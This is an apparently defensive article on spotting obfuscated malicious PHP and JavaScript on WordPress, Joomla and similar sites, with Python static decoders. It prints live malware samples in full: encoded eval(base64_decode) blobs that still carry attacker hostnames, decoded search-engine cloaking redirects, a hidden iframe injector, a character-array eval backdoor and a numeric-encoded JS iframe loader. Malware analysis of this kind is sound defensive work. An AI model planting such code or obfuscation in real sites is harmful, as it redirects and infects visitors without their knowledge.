Examples of Malicious PHP Codes


PHP is a powerful scripting language, and its built-in base64 encode/decode functions let hackers obfuscate their code, which is quite effective at hiding what the code does. On PHP sites such as WordPress, Joomla and Drupal (and many other CMSes), base64 encoding is a common technique hackers use to disguise injected code.

This simple line of code

$tmp = base64_encode('I am a really malicious line of code!');

base64 encodes the string "I am a really malicious line of code!". The line echo($tmp) will print the encoded string "SSBhbSBhIHJlYWxseSBtYWxpY2lvdXMgbGluZSBvZiBjb2RlIQ==" to the browser. The hacker then plants the encoded string, wrapped in base64_decode and eval, in the pages of the site:

eval(base64_decode('SSBhbSBhIHJlYWxseSBtYWxpY2lvdXMgbGluZSBvZiBjb2RlIQ=='));

When the page is requested, eval() decodes the string on the server and runs the result as PHP, so whatever the hidden code does (redirects, injected HTML, a backdoor) happens before anything is sent to the visitor. A site owner would instantly be suspicious of

I am a really malicious line of code!

but the purpose of the base64 encoded version is far less obvious. While eval(base64_decode('..[seemingly random string]..')); is the most common form, hackers also chain other PHP functions in front of it, such as

eval(gzinflate(base64_decode('...')));
eval(gzuncompress(base64_decode('...')));
eval(gzinflate(str_rot13(base64_decode('...'))));

When this code runs on your server, only its output ends up in the HTML sent to the visitor's browser. If you open the page in a browser and view the source, you will not see the PHP; you will only see whatever output the script generated. To find and remove the actual PHP you have to look at the infected files on the server (grepping the document root for eval(base64_decode, gzinflate, gzuncompress and str_rot13 is a good first step). There are a lot of tools online that will decode most base64 encoded blobs; decode statically, and never paste a sample into eval to "see what it does".
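As an added example (not code from the original post), here is the kind of offline decoder the paragraph above refers to: it statically peels eval(...) wrappers built from the four PHP functions listed, innermost first, and loops so that "double encoded" samples unwrap fully. The base64 blob is not a real sample; it is built inline from a constructed payload (the hostname example.invalid is a reserved name). Nothing is ever executed, only decoded.

```python
import base64
import codecs
import re
import zlib

# Outermost eval( f1( f2( ... 'blob' ) ) ); using the wrapper functions this page lists.
WRAPPER_RE = re.compile(
    r"^\s*eval\s*\(\s*"
    r"(?P<chain>(?:(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(\s*)+)"
    r"(?P<q>['\"])(?P<blob>[^'\"]*)(?P=q)\s*\)+\s*;?\s*$",
    re.S,
)

def _rot13(data: bytes) -> bytes:
    # PHP's str_rot13 rotates ASCII letters only; every other byte passes through.
    return codecs.encode(data.decode("latin-1"), "rot13").encode("latin-1")

def _deflate(data: bytes) -> bytes:
    # gzdeflate(): raw DEFLATE stream without zlib header/checksum (wbits=-15).
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()

# PHP decode function -> Python equivalent, plus the inverse used to build samples.
DECODERS = {
    "base64_decode": base64.b64decode,                # lenient, like PHP's default
    "gzinflate": lambda d: zlib.decompress(d, -15),   # raw DEFLATE
    "gzuncompress": zlib.decompress,                  # zlib-wrapped stream
    "str_rot13": _rot13,
}
ENCODERS = {
    "base64_decode": base64.b64encode,
    "gzinflate": _deflate,
    "gzuncompress": zlib.compress,
    "str_rot13": _rot13,
}

def peel(code: str, max_layers: int = 10):
    """Statically unwrap eval(...) layers; nothing is executed.
    Returns (plaintext, layers); each removed chain is listed outer -> inner."""
    layers = []
    for _ in range(max_layers):
        m = WRAPPER_RE.match(code)
        if not m:
            break
        chain = re.findall(r"[a-z0-9_]+", m.group("chain"))  # outer -> inner
        data = m.group("blob").encode("latin-1")
        for fn in reversed(chain):                            # decode innermost first
            data = DECODERS[fn](data)
        code = data.decode("latin-1")
        layers.append(chain)
    return code, layers

def wrap(payload: str, chain) -> str:
    """Inverse of one peel() step: encode payload the way a dropper would."""
    assert chain[-1] == "base64_decode", "innermost layer must be base64 so the blob is quotable"
    data = payload.encode("latin-1")
    for fn in chain:                      # apply the inverse of each decoder, outer first
        data = ENCODERS[fn](data)
    return "eval(%s('%s')%s);" % ("(".join(chain), data.decode("latin-1"), ")" * (len(chain) - 1))

# Constructed sample, not from a real infection: a redirect, double encoded.
PAYLOAD = 'header("Location: http://example.invalid/"); exit();'
SAMPLE = wrap(wrap(PAYLOAD, ["gzinflate", "str_rot13", "base64_decode"]), ["base64_decode"])

if __name__ == "__main__":
    text, layers = peel(SAMPLE)
    for chain in layers:
        print("peeled:", "(".join(chain) + "(...)")
    print(text)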

The following base64 encoded PHP was found in the homepage (index.php) of a Joomla site, but this type of code can be found on any site running PHP.

eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHRydW09aGVhZGVyc19zZW50KCk7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWE9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKHN0cmlzdHIoJHVhLCJtc2llIikpew0KaWYgKCEkdHJ1bSl7DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2FsYXBvdHJlbW5iYS5vc2EucGwvcmlmLyIpOw0KCQlleGl0KCk7DQoJfQ0KCX0NCn1lbHNlIHsNCmVjaG8gIjxpZnJhbWUgc3JjPSdodHRwOi8vcnRqaHRleWp0eWp0eWoub3JnZS5wbC9tZG0vJyBmcmFtZWJvcmRlcj0wIGhlaWdodD0xIHdpZHRoPTEgc2Nyb2xsaW5nPW5vPjwvaWZyYW1lPiI7DQp9DQoJfQ=="));

Which decodes to the following script (URLs defanged as hxxp://):

error_reporting(0);
$trum=headers_sent();
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($ua,"msie")){
  if (!$trum){
    if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
      if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){
        header("Location: hxxp://alapotremnba.osa.pl/rif/");
        exit();
      }
    }
  }else {
    echo "<iframe src='hxxp://rtjhteyjtyjtyj.orge.pl/mdm/' frameborder=0 height=1 width=1 scrolling=no></iframe>";
  }
}

Now let's take a closer look at the code.

error_reporting(0); –> Turns off PHP error reporting.

Note: any time you see a PHP script start with

error_reporting(0); or error_reporting(E_ERROR | E_WARNING | E_PARSE); or ini_set('display_errors', "0");

you should be suspicious. Hackers use these lines to stop PHP from printing the warnings and notices that would otherwise give the injected code away.

$trum=headers_sent(); –> Sets the variable to true if the HTTP headers have already been sent to the requester (once they have, a Location: redirect is no longer possible).

$referer=$_SERVER['HTTP_REFERER']; –> Sets the variable to the referring page.

$ua=$_SERVER['HTTP_USER_AGENT']; –> Sets the variable to the User-Agent in the request.

if (stristr($ua,"msie")) –> If the string 'msie' is in the User-Agent (the visitor is using Internet Explorer), continue. stristr() is case-insensitive.

if (!$trum) –> If the headers haven't been sent yet, continue...

if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) –> If 'yahoo', 'google' or 'bing' is in the URL of the referring page, i.e. the visitor came from a search results page, continue.

if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")) –> Meant to skip the redirect when the referring search used the site:, cache: or inurl: operators, the kind of query a site owner or a researcher runs rather than an ordinary visitor. Note the `or`: this condition is only false when all three words appear in the referrer at once, so in practice the exclusion almost never suppresses the redirect. The author of the script evidently meant `and`.

header("Location: hxxp://alapotremnba.osa.pl/rif/"); –> Redirects the request to a malicious location.

exit(); –> Stops the script so nothing else is sent after the redirect.

else –> This else belongs to the 'headers sent' check. If the headers have already gone out, a redirect would fail (and raise a PHP warning), so instead the script injects a hidden 1x1 iframe into the page.

echo "<iframe src='hxxp://rtjhteyjtyjtyj.orge.pl/mdm/' frameborder=0 height=1 width=1 scrolling=no></iframe>"; –> Writes the malicious iframe.
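The practical consequence of these conditions is cloaking: the owner, who opens the site directly in a normal browser, never sees the redirect, and neither does a crawler without a search-engine Referer. To reproduce it you have to request the page with an MSIE User-Agent and a Referer that looks like a search results URL. The emulation below is an added example (not code from the post or from the malware) that walks the same branch structure over a few constructed requests; the User-Agent strings and URLs are made up for illustration. It also exposes the `or`/`and` slip in the operator check.

```python
# Emulation of the decoded redirect script's branch structure (added example).
SEARCH_ENGINES = ("yahoo", "google", "bing")
OPERATORS = ("site", "cache", "inurl")

def decide(user_agent: str, referer: str, headers_sent: bool = False, as_written: bool = True) -> str:
    """Return 'redirect', 'iframe' or 'none' for one request.

    as_written=True reproduces the sample's `or` between the three negated
    operator tests; as_written=False uses `and`, which is what the exclusion
    was evidently meant to do."""
    ua, ref = user_agent.lower(), referer.lower()     # stristr() is case-insensitive
    if "msie" not in ua:
        return "none"                  # only Internet Explorer is targeted
    if headers_sent:
        return "iframe"                # too late to redirect: inject the iframe instead
    if not any(engine in ref for engine in SEARCH_ENGINES):
        return "none"                  # direct visits, bookmarks and crawlers are left alone
    operator_absent = [op not in ref for op in OPERATORS]
    exclusion_passed = any(operator_absent) if as_written else all(operator_absent)
    return "redirect" if exclusion_passed else "none"

# Constructed requests (assumed values, not taken from any log).
IE = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)"
FIREFOX = "Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0"
GOOGLEBOT = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

REQUESTS = {
    "owner typing the URL":          (FIREFOX, ""),
    "crawler":                       (GOOGLEBOT, ""),
    "IE visitor from Google":        (IE, "http://www.google.com/search?q=cheap+widgets"),
    "IE owner checking site: query": (IE, "http://www.google.com/search?q=site:example.invalid"),
}

def run_all(as_written: bool = True) -> dict:
    return {name: decide(ua, ref, as_written=as_written) for name, (ua, ref) in REQUESTS.items()}

if __name__ == "__main__":
    for name, verdict in run_all().items():
        print(f"{name:32} -> {verdict}")
```

With the script as written, the "site:" query is still redirected because only one of the three negated tests needs to pass; with `and` it is left alone.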

The following are some commonly used conditional redirects.

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vd3d3Ni51aW9wcXcuamt1Yi5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));

Which decodes to another conditional redirect, this one with a much longer list of referrers (Russian search engines, URL shorteners and social networks included) and a User-Agent check that skips only IE 7:

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
  $referer=$_SERVER['HTTP_REFERER'];
  $uag=$_SERVER['HTTP_USER_AGENT'];
  if ($uag) {
    if (!stristr($uag,"MSIE 7.0")){
      if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com") or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
        if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
          header("Location: hxxp://www6.uiopqw.jkub.com/");
          exit();
        }
      }
    }
  }
}

eval(base64_decode("aWYgKHN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiYmluZyIpKSB7DQpwcmVnX21hdGNoICgiL3FcPSguKj8pJi8iLCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sJGtrKTsNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3Byb3BwZXJhLmNvLmNjLz9xPSIuJGtrWzFdKTsNCgkJZXhpdCgpOw0KfQ0KZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInlhaG9vIikpIHsNCnByZWdfbWF0Y2ggKCIvcFw9KC4qPykmLyIsJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwka2spOw0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vcHJvcHBlcmEuY28uY2MvP3E9Ii4ka2tbMV0pOw0KCQlleGl0KCk7DQp9ZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImdvb2dsZSIpKSB7DQoJaWYgKCFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sIi5udSIpIGFuZCAhc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJzaXRlIikgYW5kICFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImludXJsIikpew0KCQlwcmVnX21hdGNoICgiL3FcPSguKikvIiwkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCRrayk7DQoJCWlmIChzdHJpc3RyKCRra1sxXSwiJiIpKSB7DQoJCQlwcmVnX21hdGNoICgiLyguKj8pXCYvIiwka2tbMV0sJGtleTIpOw0KCQkJJGtleXdvcmQ9dXJsZGVjb2RlKCRrZXkyWzFdKTsNCgkJfWVsc2Ugew0KCQkJJGtleXdvcmQ9dXJsZGVjb2RlKCRra1sxXSk7DQoJCX0NCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3Byb3BwZXJhLmNvLmNjLz9xPSIuJGtleXdvcmQpOw0KCQlleGl0KCk7DQoJfQ0KDQp9"));

Which decodes to a redirect that also forwards the visitor's search keywords (the q= or p= parameter of the referring search URL) to the attacker's site; note that this one uses `and` for the operator check, so site: and inurl: queries really are skipped:

if (stristr($_SERVER[HTTP_REFERER],"bing")){
  preg_match ("/q\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk);
  header("Location: hxxp://proppera.co.cc/?q=".$kk[1]);
  exit();
}
elseif (stristr($_SERVER[HTTP_REFERER],"yahoo")){
  preg_match ("/p\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk);
  header("Location: hxxp://proppera.co.cc/?q=".$kk[1]);
  exit();
}elseif (stristr($_SERVER[HTTP_REFERER],"google")){
  if (!stristr($_SERVER[HTTP_REFERER],".nu") and !stristr($_SERVER[HTTP_REFERER],"site") and !stristr($_SERVER[HTTP_REFERER],"inurl")){
    preg_match ("/q\=(.*)/",$_SERVER[HTTP_REFERER],$kk);
    if (stristr($kk[1],"&")) {
      preg_match ("/(.*?)\&/",$kk[1],$key2);
      $keyword=urldecode($key2[1]);
    }else{
      $keyword=urldecode($kk[1]);
    }
    header("Location: hxxp://proppera.co.cc/?q=".$keyword);
    exit();
  }
}

eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2J1eW9yZGllLm9zYS5wbC8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCn0="));

Which decodes to the same pattern as the Joomla sample above, minus the User-Agent check:

error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
  $referer=$_SERVER['HTTP_REFERER'];
  $ua=$_SERVER['HTTP_USER_AGENT'];
  if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")){
    if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){
      header("Location: hxxp://buyordie.osa.pl/");
      exit();
    }
  }
}

The following block of code can be found on a lot of WordPress sites. In most cases it redirects search engine visitors to uniqtext.com/search.php?theme=[search query used]

$md5 = "a5d67011f6466a82320bc9bcbcaab8c5";
$wp_salt = array("n",'(','o',"l","d",'c','r','e','f',"v","$","_",';','g',"z","b",'t','6',")","s",'i','4','a');
$wp_add_filter = create_function('
.'v',$wp_salt[7].$wp_salt[9].$wp_salt[22].$wp_salt[3].$wp_salt[1].$wp_salt[13].$wp_salt[14].$wp_salt[20].$wp_salt[0].$wp_salt[8].$wp_salt[3].$wp_salt[22].$wp_salt[16].$wp_salt[7].$wp_salt[1].$wp_salt[15].$wp_salt[22].$wp_salt[19].$wp_salt[7].$wp_salt[17].$wp_salt[21].$wp_salt[11].$wp_salt[4].$wp_salt[7].$wp_salt[5].$wp_salt[2].$wp_salt[4].$wp_salt[7].$wp_salt[1].$wp_salt[10].$wp_salt[9].$wp_salt[18].$wp_salt[18].$wp_salt[18].$wp_salt[12]);
$wp_add_filter('FZi3zoaMsYQvx7YoyEmWC3LOmeYIXnLO6erP93c0IK1mdvYZyisb/l1/7VQN2VH+O8/2ksD+ryh/c1H++19i2qLCeiliH4ApgAVMQYau3F32r98uNi45nQSIJNUEGSFKAIBXDd9B06LQ0LORUKbf3KKVjQeHMHgGOqoqyoNqLNYHyk/XnJ73um2b38HtRLjZ86P3WOLwh...... [snipped a bit] .......7PaEHk/TSye7MrKqpM1lUCzAjX5NwpW5X803CpCvkTWBYP7paOaRsiz+vr/BOf1F3TchA+ewJGrYPfrzliW6r984ZKT3qdN58EVdA6ZFNrgjTjevu6aExuKs8UE9pUnOYVVWwXWrV4lSe6zyxzR2zSYyCNrXdYEgLd//+9+//vOf//z3/wE=');

(The start of the create_function() argument list is missing from this copy.) The point of the $wp_salt array is to avoid the telltale eval/base64_decode strings: the indexes spell out eval(gzinflate(base64_decode($v)));, so $wp_add_filter is just eval behind create_function(), and the long base64 string handed to it is the real payload.
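Resolving that index chain by hand is tedious, so here, as an added example (not the post's code), is a small resolver: it parses the one-character PHP literals out of the array and evaluates the $wp_salt[i] chain. The array and the chain are copied from the sample above; the variable name is parameterised because the same trick turns up under other names.

```python
import re

# Copied from the WordPress sample above: the character pool and the index chain
# that builds the function body handed to create_function().
WP_SALT = """array("n",'(','o',"l","d",'c','r','e','f',"v","$","_",';','g',"z","b",'t','6',")","s",'i','4','a')"""
BODY = ("$wp_salt[7].$wp_salt[9].$wp_salt[22].$wp_salt[3].$wp_salt[1].$wp_salt[13]."
        "$wp_salt[14].$wp_salt[20].$wp_salt[0].$wp_salt[8].$wp_salt[3].$wp_salt[22]."
        "$wp_salt[16].$wp_salt[7].$wp_salt[1].$wp_salt[15].$wp_salt[22].$wp_salt[19]."
        "$wp_salt[7].$wp_salt[17].$wp_salt[21].$wp_salt[11].$wp_salt[4].$wp_salt[7]."
        "$wp_salt[5].$wp_salt[2].$wp_salt[4].$wp_salt[7].$wp_salt[1].$wp_salt[10]."
        "$wp_salt[9].$wp_salt[18].$wp_salt[18].$wp_salt[18].$wp_salt[12]")

def php_char_array(src: str):
    """One-character PHP string literals (single- or double-quoted), in array order."""
    return re.findall(r"""['"](.)['"]""", src)

def resolve(array_src: str, expr: str, var: str = "wp_salt") -> str:
    """Evaluate a chain of $var[i] lookups joined with '.' against the array."""
    pool = php_char_array(array_src)
    return "".join(pool[int(i)] for i in re.findall(r"\$%s\[(\d+)\]" % var, expr))

if __name__ == "__main__":
    print(resolve(WP_SALT, BODY))   # eval(gzinflate(base64_decode($v)));
```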

On many sites, hackers use obfuscated PHP like this...

eval(gzinflate(base64_decode('3VZNc5swEP0rLRcgTBwkhIAh6qW99NxjJgfHhppMgm1Q6ok94bdXu5IwdmKHZnrodAbLeNndt19vzXU7a6qV/DIX36ayyOeiLjaf5p6fL8Tlatq0xfdaem5IqOtfxXlVepuqni83k/ly9vRY1NKXzfNO2TjrTeFMVs1SLuXzqniZTeVs4a3Xa3+33Qp3+uDm8P3LDbbbvG2F44Az4u9K4ZZu4Dbqs3xUx9fFtHHzUpTqFmRzdRRu/lIIuajam3LSPt21svEI8ZWr21wK91k9roUTTeIOPjGBI+xI3JGsY1kXMyVgKUgTOECJZXDHlKSjVGn3oqSL0Elkfh8pxxxQlAWIGOkYegTzKDU/eguFTlKENiFk2gyFBB2AmCqo2Eo4uIpNJscZxfwYQkkABW5pemTJwYpYxUiHrgM7gTOuVqnG1UEl+1R5R7MzoZJYRwBPwAXtSxETrKy6IAuFAU+pNcaI4CF6Tgdt0RFy1B7q9ocS61SYNdFuuQFFcWrdY2TYlUTXArxqRVWeUKth1BQu7BwcDC8MAw/Wt9h6J6a2iLLPW5tHe2VikiN2pnRlzlhwE3w2GNlBYVPji/dRWEnU9y/Ww4NYJlC8dM/1VNkS9n76fjCrZqqWGiVmQJLBkGhfllghppZCOtT2gGmwgRTziEIYLd27k/OllAg/R4WhANF16Cx9Ix8yknRv09VuAo5+cBPRzJJxBMWYodh+Gm0Jz+4mu2/OcLDfPLpEIc44Hy4/292k5zj0NDniejo5YrMeT/KfE/qtyr2iH0T3h0swdf002Udgfg+Q3uk94k6GvWQy4M1Nd7FgPXv2n9kSF8v4INRPdyof4sZJxb5KOQP/Sf/C+8vQM7E/FvsMZVRRAfzjYGBa9iLJ5e1M2lXD5X0nGnn9G98vp+Xy8arRJhXnwUnJK+CwN/diwreKNs2+CGbqv55U956l4sLj16SgFzUN/e3yvAF3zbXSgveO7dbv/AcJ1j7+fWVeQP+DQ==')));

to write obfuscated JavaScript like this (the characters are stored as a '~'-separated list of numbers and rebuilt at run time; note that the script depends on parseInt('012') being read as octal 10, so h = -2)...

<script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{new'qwe'.prototype}catch(qqq){zz='al';zz='v'+zz;ss='';if(1){f='f'+'r'+'om'+'Char';f=f+'C'+'od'+'e';}e=this[f.substr(11)+zz];t='y';}
n='3.5~3.5~51.5~50~15~19~49~54.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~19.5~44.5~23~45.5~19.5~60.5~5.5~3.5~3.5~3.5~51.5~50~56~47.5~53.5~49.5~56~19~19.5~28.5~5.5~3.5~3.5~61.5~15~49.5~53~56.5~49.5~15~60.5~5.5~3.5~3.5~3.5~49~54.5~48.5~57.5~53.5~49.5~54~57~22~58.5~56~51.5~57~49.5~19~16~29~51.5~50~56~47.5~53.5~49.5~15~56.5~56~48.5~29.5~18.5~51~57~57~55~28~22.5~22.5~53.5~54.5~57~51.5~58~49.5~53.5~57.5~56.5~22~53.5~54.5~54.5~54.5~22~48.5~54.5~53.5~22.5~56.5~51~54.5~58.5~57~51~56~49.5~47.5~49~22~55~51~55~30.5~57~29.5~25~25.5~23.5~24~24~26.5~26.5~24.5~18.5~15~58.5~51.5~49~57~51~29.5~18.5~23.5~23~18.5~15~51~49.5~51.5~50.5~51~57~29.5~18.5~23.5~23~18.5~15~56.5~57~59.5~53~49.5~29.5~18.5~58~51.5~56.5~51.5~48~51.5~53~51.5~57~59.5~28~51~51.5~49~49~49.5~54~28.5~55~54.5~56.5~51.5~57~51.5~54.5~54~28~47.5~48~56.5~54.5~53~57.5~57~49.5~28.5~53~49.5~50~57~28~23~28.5~57~54.5~55~28~23~28.5~18.5~30~29~22.5~51.5~50~56~47.5~53.5~49.5~30~16~19.5~28.5~5.5~3.5~3.5~61.5~5.5~3.5~3.5~50~57.5~54~48.5~57~51.5~54.5~54~15~51.5~50~56~47.5~53.5~49.5~56~19~19.5~60.5~5.5~3.5~3.5~3.5~58~47.5~56~15~50~15~29.5~15~49~54.5~48.5~57.5~53.5~49.5~54~57~22~48.5~56~49.5~47.5~57~49.5~33.5~53~49.5~53.5~49.5~54~57~19~18.5~51.5~50~56~47.5~53.5~49.5~18.5~19.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~56.5~56~48.5~18.5~21~18.5~51~57~57~55~28~22.5~22.5~53.5~54.5~57~51.5~58~49.5~53.5~57.5~56.5~22~53.5~54.5~54.5~54.5~22~48.5~54.5~53.5~22.5~56.5~51~54.5~58.5~57~51~56~49.5~47.5~49~22~55~51~55~30.5~57~29.5~25~25.5~23.5~24~24~26.5~26.5~24.5~18.5~19.5~28.5~50~22~56.5~57~59.5~53~49.5~22~58~51.5~56.5~51.5~48~51.5~53~51.5~57~59.5~29.5~18.5~51~51.5~49~49~49.5~54~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~55~54.5~56.5~51.5~57~51.5~54.5~54~29.5~18.5~47.5~48~56.5~54.5~53~57.5~57~49.5~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~53~49.5~50~57~29.5~18.5~23~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~57~54.5~55~29.5~18.5~23~18.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~58.5~51.5~49~57~51~18.5~21~18.5~23.5~23~18.5~19.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~51~49.5~51.5~50.5~51~57~18.5~21~18.5~23.5~23~18.5~19.5~28.5~5.5~3.5~3.5~3.5~49~54.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~19.5~44.5~23~45.5~22~47.5~55~55~49.5~54~49~32.5~51~51.5~53~49~19~50~19.5~28.5~5.5~3.5~3.5~61.5'.split('a~'.substr(1));
for(i=0;i!=611;i++){j=i;ss=ss+Stringf;}if(1)q=ss;if(zz)e(''+q);
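The String.fromCharCode expression inside the loop did not survive intact in the copy above, but the mapping can be recovered from the output that follows: each number n becomes the character with code 2n + 2, i.e. -h*(n + 1) with h = -2. The decoder below is an added example (not the post's code) that applies that assumed mapping to the opening part of the number string copied from the sample; it also shows why the sample only worked on older browsers, since ES5 changed parseInt('012') from 10 to 12 and the characters come out as garbage with h = -2.4.

```python
# Opening part of the '~'-separated number string from the sample above; the
# full string decodes to the iframe loader shown next on the page.
NUMBERS = ("3.5~3.5~51.5~50~15~19~49~54.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~"
           "49.5~53.5~49.5~54~57~56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~"
           "49~59.5~18.5~19.5~44.5~23~45.5~19.5~60.5~5.5~3.5~3.5~3.5~51.5~50~56~47.5~53.5~49.5~"
           "56~19~19.5~28.5~5.5~3.5~3.5~61.5~15~49.5~53~56.5~49.5~15~60.5")

def legacy_parse_int(s: str) -> int:
    """parseInt() as ES3-era browsers did it: a leading zero meant octal, so
    '012' -> 10. ES5 dropped that rule, so modern engines return 12."""
    if len(s) > 1 and s[0] == "0" and s.isdigit():
        return int(s, 8)
    return int(s)

def decode(numbers: str, h: float) -> str:
    # Assumed mapping, reconstructed from the decoded output: code point = -h * (n + 1),
    # which is 2n + 2 when h == -2. The sample's own fromCharCode line is not on the page.
    return "".join(chr(round(-h * (float(n) + 1))) for n in numbers.split("~"))

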